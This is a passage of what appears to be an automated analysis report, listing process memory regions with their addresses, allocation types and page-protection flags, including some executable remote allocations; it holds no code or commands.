page read and write
|
||
|
88A7000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
23B28191000
|
heap
|
page read and write
|
||
|
23B2835A000
|
heap
|
page read and write
|
||
|
23B2849D000
|
heap
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
23B2837B000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
27A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C673600000
|
heap
|
page read and write
|
||
|
765D000
|
heap
|
page read and write
|
||
|
23B28350000
|
heap
|
page read and write
|
||
|
27C5D000
|
trusted library allocation
|
page read and write
|
||
|
25540000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B28510000
|
heap
|
page read and write
|
||
|
23B2835F000
|
heap
|
page read and write
|
||
|
23B28111000
|
heap
|
page read and write
|
||
|
1C67360B000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
AD7E1BB000
|
stack
|
page read and write
|
||
|
4FA96FD000
|
stack
|
page read and write
|
||
|
23B2856F000
|
heap
|
page read and write
|
||
|
2545B000
|
trusted library allocation
|
page read and write
|
||
|
291A8445000
|
trusted library allocation
|
page read and write
|
||
|
318E000
|
stack
|
page read and write
|
||
|
4B60000
|
heap
|
page execute and read and write
|
||
|
23B28836000
|
heap
|
page read and write
|
||
|
25540000
|
trusted library allocation
|
page read and write
|
||
|
880C000
|
stack
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B28540000
|
heap
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
23B26389000
|
heap
|
page read and write
|
||
|
291A6A3A000
|
heap
|
page read and write
|
||
|
4746000
|
remote allocation
|
page execute and read and write
|
||
|
23B28321000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B2815C000
|
heap
|
page read and write
|
||
|
23B2855E000
|
heap
|
page read and write
|
||
|
291A66B0000
|
trusted library allocation
|
page read and write
|
||
|
9C60000
|
direct allocation
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
23B28133000
|
heap
|
page read and write
|
||
|
23B287BE000
|
heap
|
page read and write
|
||
|
291BEE50000
|
heap
|
page read and write
|
||
|
23B26200000
|
heap
|
page read and write
|
||
|
98E0000
|
heap
|
page readonly
|
||
|
320E000
|
stack
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
254EC000
|
stack
|
page read and write
|
||
|
291A4D0E000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
23B26389000
|
heap
|
page read and write
|
||
|
23B28383000
|
heap
|
page read and write
|
||
|
4FA90FE000
|
stack
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
23B28335000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
49CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
291A6B95000
|
trusted library allocation
|
page read and write
|
||
|
23B28B30000
|
heap
|
page read and write
|
||
|
854E000
|
stack
|
page read and write
|
||
|
2E7C000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
253FC000
|
stack
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
9C10000
|
direct allocation
|
page read and write
|
||
|
4FA95FB000
|
stack
|
page read and write
|
||
|
23B2813B000
|
heap
|
page read and write
|
||
|
24EB0000
|
heap
|
page read and write
|
||
|
7DF40A7D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
25471000
|
trusted library allocation
|
page read and write
|
||
|
BB96000
|
direct allocation
|
page execute and read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
49B9000
|
trusted library allocation
|
page read and write
|
||
|
25462000
|
trusted library allocation
|
page read and write
|
||
|
27CAD000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B2853D000
|
heap
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
291A679C000
|
heap
|
page read and write
|
||
|
23B28492000
|
heap
|
page read and write
|
||
|
291A82A5000
|
trusted library allocation
|
page read and write
|
||
|
23B284AC000
|
heap
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
23B2826A000
|
heap
|
page read and write
|
||
|
291B6E0A000
|
trusted library allocation
|
page read and write
|
||
|
23B2814B000
|
heap
|
page read and write
|
||
|
2518F000
|
stack
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B28355000
|
heap
|
page read and write
|
||
|
23B28210000
|
heap
|
page read and write
|
||
|
291BEF50000
|
heap
|
page read and write
|
||
|
23B282A3000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B282B3000
|
heap
|
page read and write
|
||
|
23B28345000
|
heap
|
page read and write
|
||
|
257B6000
|
trusted library allocation
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
23B2852E000
|
heap
|
page read and write
|
||
|
AD7D74D000
|
stack
|
page read and write
|
||
|
AD7DCFE000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
23B2856F000
|
heap
|
page read and write
|
||
|
24FCE000
|
stack
|
page read and write
|
||
|
27C3E000
|
stack
|
page read and write
|
||
|
A796000
|
direct allocation
|
page execute and read and write
|
||
|
291A4C64000
|
heap
|
page read and write
|
||
|
23B281BD000
|
heap
|
page read and write
|
||
|
23B28488000
|
heap
|
page read and write
|
||
|
23B2854B000
|
heap
|
page read and write
|
||
|
23B28314000
|
heap
|
page read and write
|
||
|
291A6780000
|
heap
|
page read and write
|
||
|
25440000
|
trusted library allocation
|
page read and write
|
||
|
23B2827C000
|
heap
|
page read and write
|
||
|
23B2815F000
|
heap
|
page read and write
|
||
|
9C00000
|
direct allocation
|
page read and write
|
||
|
252BE000
|
stack
|
page read and write
|
||
|
23B2856F000
|
heap
|
page read and write
|
||
|
23B284C3000
|
heap
|
page read and write
|
||
|
7F300000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C2B000
|
trusted library allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
2792000
|
trusted library allocation
|
page read and write
|
||
|
79AD000
|
stack
|
page read and write
|
||
|
291BEFB2000
|
heap
|
page read and write
|
||
|
23B262F6000
|
heap
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
9746000
|
remote allocation
|
page execute and read and write
|
||
|
23B28563000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B28243000
|
heap
|
page read and write
|
||
|
291A4C69000
|
heap
|
page read and write
|
||
|
23B28170000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
23B261F0000
|
heap
|
page read and write
|
||
|
23B2837E000
|
heap
|
page read and write
|
||
|
23B28292000
|
heap
|
page read and write
|
||
|
770A000
|
heap
|
page read and write
|
||
|
1C673810000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
31CF000
|
unkown
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
23B28362000
|
heap
|
page read and write
|
||
|
23B2856F000
|
heap
|
page read and write
|
||
|
291B6B20000
|
trusted library allocation
|
page read and write
|
||
|
23B26275000
|
heap
|
page read and write
|
||
|
1C6735A0000
|
heap
|
page read and write
|
||
|
49F0000
|
trusted library allocation
|
page read and write
|
||
|
23B28367000
|
heap
|
page read and write
|
||
|
722A000
|
stack
|
page read and write
|
||
|
2EAF000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B2836F000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7630000
|
heap
|
page read and write
|
||
|
291A6B11000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
28370000
|
trusted library allocation
|
page read and write
|
||
|
27C67000
|
trusted library allocation
|
page read and write
|
||
|
23B2637D000
|
heap
|
page read and write
|
||
|
277CF000
|
heap
|
page read and write
|
||
|
9A50000
|
heap
|
page read and write
|
||
|
23B285D1000
|
heap
|
page read and write
|
||
|
23B2834E000
|
heap
|
page read and write
|
||
|
23B28692000
|
heap
|
page read and write
|
||
|
2865E000
|
stack
|
page read and write
|
||
|
3D46000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
291A6D37000
|
trusted library allocation
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
27C9E000
|
trusted library allocation
|
page read and write
|
||
|
49A0000
|
trusted library allocation
|
page read and write
|
||
|
23B28113000
|
heap
|
page read and write
|
||
|
291A6AD0000
|
heap
|
page execute and read and write
|
||
|
2AED000
|
stack
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B28239000
|
heap
|
page read and write
|
||
|
6F46000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27CB0000
|
trusted library allocation
|
page read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
9D96000
|
direct allocation
|
page execute and read and write
|
||
|
850D000
|
stack
|
page read and write
|
||
|
23B2856F000
|
heap
|
page read and write
|
||
|
23B281BD000
|
heap
|
page read and write
|
||
|
23B282BF000
|
heap
|
page read and write
|
||
|
28370000
|
trusted library allocation
|
page read and write
|
||
|
277F7000
|
heap
|
page read and write
|
||
|
708D000
|
stack
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
2835E000
|
stack
|
page read and write
|
||
|
23B28222000
|
heap
|
page read and write
|
||
|
25476000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
23B2839A000
|
heap
|
page read and write
|
||
|
23B28482000
|
heap
|
page read and write
|
||
|
71EE000
|
stack
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
7130000
|
direct allocation
|
page read and write
|
||
|
23B285D0000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B282A4000
|
heap
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C39000
|
trusted library allocation
|
page read and write
|
||
|
23B28136000
|
heap
|
page read and write
|
||
|
9CB0000
|
heap
|
page read and write
|
||
|
23B263AC000
|
heap
|
page read and write
|
||
|
23B2826C000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
2546E000
|
trusted library allocation
|
page read and write
|
||
|
27C53000
|
trusted library allocation
|
page read and write
|
||
|
98F5000
|
heap
|
page read and write
|
||
|
23B28340000
|
heap
|
page read and write
|
||
|
25781000
|
trusted library allocation
|
page read and write
|
||
|
27CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9C80000
|
direct allocation
|
page read and write
|
||
|
257F7000
|
trusted library allocation
|
page read and write
|
||
|
8B30000
|
direct allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
49D2000
|
trusted library allocation
|
page read and write
|
||
|
6F8E000
|
stack
|
page read and write
|
||
|
25580000
|
heap
|
page read and write
|
||
|
291BF00F000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B262EB000
|
heap
|
page read and write
|
||
|
23B282C1000
|
heap
|
page read and write
|
||
|
49A4000
|
trusted library allocation
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B28311000
|
heap
|
page read and write
|
||
|
28520000
|
trusted library allocation
|
page read and write
|
||
|
291A6946000
|
heap
|
page read and write
|
||
|
CF96000
|
direct allocation
|
page execute and read and write
|
||
|
23B28697000
|
heap
|
page read and write
|
||
|
5146000
|
remote allocation
|
page execute and read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
24F0E000
|
stack
|
page read and write
|
||
|
23B2814A000
|
heap
|
page read and write
|
||
|
4FA8D5A000
|
stack
|
page read and write
|
||
|
28500000
|
trusted library allocation
|
page read and write
|
||
|
23B26220000
|
heap
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
27ABE000
|
stack
|
page read and write
|
||
|
4AAB000
|
trusted library allocation
|
page read and write
|
||
|
277D7000
|
heap
|
page read and write
|
||
|
277D5000
|
heap
|
page read and write
|
||
|
7150000
|
direct allocation
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
792E000
|
stack
|
page read and write
|
||
|
27807000
|
heap
|
page read and write
|
||
|
4BD1000
|
trusted library allocation
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
26781000
|
trusted library allocation
|
page read and write
|
||
|
2504B000
|
stack
|
page read and write
|
||
|
AD7E03F000
|
stack
|
page read and write
|
||
|
23B28113000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B2812B000
|
heap
|
page read and write
|
||
|
9B60000
|
direct allocation
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
277D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2546A000
|
trusted library allocation
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
7090000
|
heap
|
page execute and read and write
|
||
|
23B282B8000
|
heap
|
page read and write
|
||
|
2869F000
|
stack
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
23B28582000
|
heap
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
291BF016000
|
heap
|
page read and write
|
||
|
4AA8000
|
trusted library allocation
|
page read and write
|
||
|
291A879A000
|
trusted library allocation
|
page read and write
|
||
|
291A731C000
|
trusted library allocation
|
page read and write
|
||
|
23B281B0000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
23B28295000
|
heap
|
page read and write
|
||
|
23B28710000
|
heap
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
23B2854F000
|
heap
|
page read and write
|
||
|
5B46000
|
remote allocation
|
page execute and read and write
|
||
|
28360000
|
trusted library allocation
|
page read and write
|
||
|
6FCF000
|
stack
|
page read and write
|
||
|
7600000
|
heap
|
page execute and read and write
|
||
|
4980000
|
trusted library section
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
7877000
|
trusted library allocation
|
page read and write
|
||
|
253B0000
|
heap
|
page read and write
|
||
|
23B2856F000
|
heap
|
page read and write
|
||
|
23B262FF000
|
heap
|
page read and write
|
||
|
23B28178000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
291A4FF5000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
291A6994000
|
heap
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page read and write
|
||
|
4FA9AFB000
|
stack
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
27C72000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
28370000
|
trusted library allocation
|
page read and write
|
||
|
72CD000
|
stack
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
27CA0000
|
trusted library allocation
|
page read and write
|
||
|
9C30000
|
direct allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
23B28275000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
27CC0000
|
trusted library allocation
|
page read and write
|
||
|
8645000
|
trusted library allocation
|
page read and write
|
||
|
23B28184000
|
heap
|
page read and write
|
||
|
3C60000
|
remote allocation
|
page execute and read and write
|
||
|
23B2813E000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
8B40000
|
direct allocation
|
page read and write
|
||
|
291BEF65000
|
heap
|
page read and write
|
||
|
23B26389000
|
heap
|
page read and write
|
||
|
291A4CAD000
|
heap
|
page read and write
|
||
|
78EE000
|
stack
|
page read and write
|
||
|
25490000
|
trusted library allocation
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
27CF0000
|
trusted library allocation
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
27CB0000
|
trusted library allocation
|
page read and write
|
||
|
23B285D1000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
27CB0000
|
trusted library allocation
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
27A3D000
|
stack
|
page read and write
|
||
|
AD7EC0E000
|
stack
|
page read and write
|
||
|
25278000
|
stack
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
9AD5000
|
heap
|
page read and write
|
||
|
291A8990000
|
trusted library allocation
|
page read and write
|
||
|
23B28111000
|
heap
|
page read and write
|
||
|
291BF006000
|
heap
|
page read and write
|
||
|
23B28556000
|
heap
|
page read and write
|
||
|
23B28620000
|
heap
|
page read and write
|
||
|
291A6610000
|
heap
|
page read and write
|
||
|
AD7D6C3000
|
stack
|
page read and write
|
||
|
23B2827C000
|
heap
|
page read and write
|
||
|
23B285A6000
|
heap
|
page read and write
|
||
|
23B28168000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
25550000
|
heap
|
page read and write
|
||
|
23B28173000
|
heap
|
page read and write
|
||
|
9C40000
|
direct allocation
|
page read and write
|
||
|
2BED000
|
stack
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
27CE0000
|
trusted library allocation
|
page read and write
|
||
|
23B2853D000
|
heap
|
page read and write
|
||
|
23B287BE000
|
heap
|
page read and write
|
||
|
2514E000
|
stack
|
page read and write
|
||
|
23B2639D000
|
heap
|
page read and write
|
||
|
25770000
|
heap
|
page execute and read and write
|
||
|
2797000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
734A000
|
stack
|
page read and write
|
||
|
23B28836000
|
heap
|
page read and write
|
||
|
9B08000
|
heap
|
page read and write
|
||
|
23B28492000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
AD7EC8D000
|
stack
|
page read and write
|
||
|
27C61000
|
trusted library allocation
|
page read and write
|
||
|
23B2836A000
|
heap
|
page read and write
|
||
|
23B28492000
|
heap
|
page read and write
|
||
|
2750000
|
trusted library allocation
|
page read and write
|
||
|
23B28348000
|
heap
|
page read and write
|
||
|
7722000
|
heap
|
page read and write
|
||
|
7FA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B28391000
|
heap
|
page read and write
|
||
|
8467000
|
stack
|
page read and write
|
||
|
291A6F81000
|
trusted library allocation
|
page read and write
|
||
|
8D46000
|
remote allocation
|
page execute and read and write
|
||
|
23B282BD000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B28564000
|
heap
|
page read and write
|
||
|
25560000
|
remote allocation
|
page read and write
|
||
|
23B28213000
|
heap
|
page read and write
|
||
|
2831E000
|
stack
|
page read and write
|
||
|
23B282B1000
|
heap
|
page read and write
|
||
|
28370000
|
trusted library allocation
|
page read and write
|
||
|
291A6AD7000
|
heap
|
page execute and read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
291A4C73000
|
heap
|
page read and write
|
||
|
9B4D000
|
heap
|
page read and write
|
||
|
98B0000
|
heap
|
page read and write
|
||
|
291A6680000
|
trusted library allocation
|
page read and write
|
||
|
23B2835B000
|
heap
|
page read and write
|
||
|
23B28482000
|
heap
|
page read and write
|
||
|
23B2826A000
|
heap
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
4AFC000
|
stack
|
page read and write
|
||
|
2543E000
|
stack
|
page read and write
|
||
|
254F0000
|
heap
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
291A6FDC000
|
trusted library allocation
|
page read and write
|
||
|
9C50000
|
direct allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
8B80000
|
direct allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
9A58000
|
heap
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
291A4DF0000
|
heap
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
23B28498000
|
heap
|
page read and write
|
||
|
23B2826C000
|
heap
|
page read and write
|
||
|
291A4C20000
|
heap
|
page read and write
|
||
|
27C80000
|
trusted library allocation
|
page read and write
|
||
|
23B28319000
|
heap
|
page read and write
|
||
|
291A4C4B000
|
heap
|
page read and write
|
||
|
704F000
|
stack
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
291BEE70000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
7687000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
291A6660000
|
trusted library allocation
|
page read and write
|
||
|
49D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
28500000
|
trusted library allocation
|
page read and write
|
||
|
789A000
|
trusted library allocation
|
page read and write
|
||
|
27CA0000
|
trusted library allocation
|
page read and write
|
||
|
23B28147000
|
heap
|
page read and write
|
||
|
28370000
|
trusted library allocation
|
page read and write
|
||
|
291BEF8B000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
291A72F1000
|
trusted library allocation
|
page read and write
|
||
|
76FB000
|
heap
|
page read and write
|
||
|
23B26380000
|
heap
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
23B285D0000
|
heap
|
page read and write
|
||
|
7350000
|
heap
|
page read and write
|
||
|
291B6B31000
|
trusted library allocation
|
page read and write
|
||
|
23B262C0000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
23B28117000
|
heap
|
page read and write
|
||
|
24F8D000
|
stack
|
page read and write
|
||
|
23B284AC000
|
heap
|
page read and write
|
||
|
23B282A3000
|
heap
|
page read and write
|
||
|
23B283A9000
|
heap
|
page read and write
|
||
|
2500D000
|
stack
|
page read and write
|
||
|
23B2854F000
|
heap
|
page read and write
|
||
|
4FA94FE000
|
stack
|
page read and write
|
||
|
23B28298000
|
heap
|
page read and write
|
||
|
23B2835A000
|
heap
|
page read and write
|
||
|
2760000
|
trusted library allocation
|
page read and write
|
||
|
9A81000
|
heap
|
page read and write
|
||
|
23B28310000
|
heap
|
page read and write
|
||
|
291B6B11000
|
trusted library allocation
|
page read and write
|
||
|
23B28322000
|
heap
|
page read and write
|
||
|
23B28557000
|
heap
|
page read and write
|
||
|
291A6949000
|
heap
|
page read and write
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
2F1B000
|
heap
|
page read and write
|
||
|
7ADB000
|
stack
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
23B2854C000
|
heap
|
page read and write
|
||
|
291A7208000
|
trusted library allocation
|
page read and write
|
||
|
4D28000
|
trusted library allocation
|
page read and write
|
||
|
291A6F42000
|
trusted library allocation
|
page read and write
|
||
|
2770000
|
trusted library allocation
|
page read and write
|
||
|
291A6A07000
|
heap
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
88B31FD000
|
stack
|
page read and write
|
||
|
AD7E13F000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
2782000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
27C40000
|
trusted library allocation
|
page read and write
|
||
|
23B2818C000
|
heap
|
page read and write
|
||
|
2FCE000
|
stack
|
page read and write
|
||
|
25581000
|
heap
|
page read and write
|
||
|
27CC0000
|
trusted library allocation
|
page read and write
|
||
|
277EE000
|
heap
|
page read and write
|
||
|
87CD000
|
stack
|
page read and write
|
||
|
1C6735C0000
|
heap
|
page read and write
|
||
|
330F000
|
stack
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
884E000
|
stack
|
page read and write
|
||
|
9CB7000
|
heap
|
page read and write
|
||
|
23B28154000
|
heap
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
28540000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B2826A000
|
heap
|
page read and write
|
||
|
23B283AD000
|
heap
|
page read and write
|
||
|
279B000
|
trusted library allocation
|
page execute and read and write
|
||
|
27C90000
|
trusted library allocation
|
page read and write
|
||
|
2547D000
|
trusted library allocation
|
page read and write
|
||
|
291BF020000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
7716000
|
heap
|
page read and write
|
||
|
28370000
|
trusted library allocation
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
27C60000
|
trusted library allocation
|
page read and write
|
||
|
8B70000
|
direct allocation
|
page read and write
|
||
|
291BF035000
|
heap
|
page read and write
|
||
|
23B287C0000
|
heap
|
page read and write
|
||
|
28520000
|
trusted library allocation
|
page read and write
|
||
|
23B2848C000
|
heap
|
page read and write
|
||
|
291A7D28000
|
trusted library allocation
|
page read and write
|
||
|
8905000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
291A6992000
|
heap
|
page read and write
|
||
|
291A7328000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
2764000
|
trusted library allocation
|
page read and write
|
||
|
9A0E000
|
stack
|
page read and write
|
||
|
291A6A19000
|
heap
|
page read and write
|
||
|
7140000
|
direct allocation
|
page read and write
|
||
|
28367000
|
trusted library allocation
|
page read and write
|
||
|
2523A000
|
stack
|
page read and write
|
||
|
23B28695000
|
heap
|
page read and write
|
||
|
27C70000
|
trusted library allocation
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
254A0000
|
trusted library allocation
|
page read and write
|
||
|
27B3E000
|
stack
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
23B28482000
|
heap
|
page read and write
|
||
|
23B282B4000
|
heap
|
page read and write
|
||
|
23B28222000
|
heap
|
page read and write
|
||
|
4A80000
|
heap
|
page readonly
|
||
|
23B282A8000
|
heap
|
page read and write
|
||
|
23B281A5000
|
heap
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
252FE000
|
stack
|
page read and write
|
||
|
23B284C3000
|
heap
|
page read and write
|
||
|
23B28386000
|
heap
|
page read and write
|
||
|
23B28199000
|
heap
|
page read and write
|
||
|
284F0000
|
trusted library allocation
|
page read and write
|
||
|
23B2814F000
|
heap
|
